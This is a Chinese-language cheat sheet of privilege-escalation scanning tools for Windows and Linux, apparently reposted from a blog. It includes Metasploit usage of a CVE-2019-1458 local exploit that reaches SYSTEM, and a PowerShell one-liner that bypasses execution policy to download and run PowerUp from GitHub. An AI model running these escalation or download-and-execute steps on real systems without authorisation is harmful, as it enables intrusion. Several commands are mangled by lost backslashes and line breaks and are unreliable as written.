干货|提权扫描工具一览
使用Windows-Exploit-Suggester解析systeminfo
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
./windows-exploit-suggester.py
使用Linux-Exploit-Suggester.sh寻找linux提权问题
https://github.com/mzet-/linux-exploit-suggester
./linux-exploit-suggester.sh
使用Sherlock
https://github.com/rasta-mouse/Sherlock
Import-Module Sherlock.ps1Find-AllVulns
使用msf查询补丁和可利用提权漏洞
查询补丁 run post/windows/gather/enum_patches [+] KB2999226 installed on 11/25/2020[+] KB976902 installed on 11/21/2010 # 查询Exp use post/multi/recon/local_exploit_suggester set LHOST <攻击机IP> set SESSION <session_id> run # 利用示例local/cve_2019_1458_wizardopium use exploit/windows/set SESSION <session_id> run getuidServer username: NT AUTHORITYSYSTEM
使用powerup检查提权漏洞
powershell.exe -exec bypass -Command "& {Import-Module .PowerUp.ps1; Invoke-AllChecks}"powershell.exe -nop -exec bypass -c "IEX (New-object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Invoke-AllChecks"
使用accesschk.exe对系统扫描发现高权限可执行程序,且能够被低权限用户更改
accesschk "d:dir"查看所有用户在d盘dir路径的子路径的权限 accesschk "Administrator "d:dir"查看Administrator用户在d盘dir路径的子路径的权限 accesschk Administrators -c *查看Administrators组对所有服务的权限 accesschk -k Guest hklmsoftware查看Guest用户对hklmsoftware注册表的权限 accesschk -ou User查看User用户对全局对象的权限
文章来源:转自Leticia's Blog
黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!
如侵权请私聊我们删文
END